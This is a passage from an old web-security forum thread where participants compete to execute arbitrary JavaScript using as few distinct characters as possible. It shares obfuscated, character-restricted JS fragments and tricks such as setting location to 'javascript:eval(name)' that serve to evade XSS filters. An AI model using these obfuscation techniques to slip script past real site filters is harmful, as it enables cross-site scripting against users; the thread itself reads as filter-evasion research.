Infinity: +[++[[]][+[]]+[[]+[][[]]][+[]][++[++[++[[]][+[]]][+[]]][+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]]]

@oxotnick: I was using ++[+[]][+[]] to get 1, has an extra + in it, I guess. thx!


@gareth: how about getting an m with just []+ or []=+


I have another set of six that work: []+=/_

It uses [].__parent__.location='javascript:eval(name)'

getting the m is the most challenging. total PoC will be over 17000 chars long though.

/=/.constructor gives a p and /=/.__proto__ gives a :



Edited 2 time(s). Last edit at 01/12/2010 05:06PM by thornmaker.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 12, 2010 05:56PM

@thornmaker [+[]][+[]]['constructor']

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 12, 2010 06:05PM

@mario aha! brilliant!

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 14, 2010 04:14AM

//Infinity:[+[++[[]][+[]]+[[]+[][[]]][+[]][++[++[++[[]][+[]]][+[]]][+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]]]+[]][+[]]

//true:[[]+[+[]==+[]]][+[]]
//false:[[]+[+[]===[]]][+[]]
//1:++[[]][+[]]
//s:[[]+[+[]===[]]][+[]][++[[]][+[]]+(++[[]][+[]])+(++[[]][+[]])]

So the technique was [].filter then [].sort then location=name
but it's 6 chars not 5 :( so I can't be bothered building it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 14, 2010 05:01AM

fwiw, I was thinking that we may not need + for string concatenation.

a=[];a[0]="a";a[1]="b";alert(a);

but we still need a way to force something to be a string (String(blah),[]+blah,etc..) and a way to remove the ",".. but still, it's possible.

As mentioned before, we dont need , or ; or \n to separate statements.

gareth came up with:

alert(1)==alert(2)==alert(3)

and we also have

[[[alert(1)][alert(2)]][[alert(3)][alert(4)]]][[[alert(5)][alert(6)]][[alert(7)][alert(8)]]]

Anyway, in case we need them, but apparently the wall is 6.. the JS GREAT CHARWALL.

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Pages: 123Next
Current Page: 1 of 3


Sorry, only registered users may post in this forum.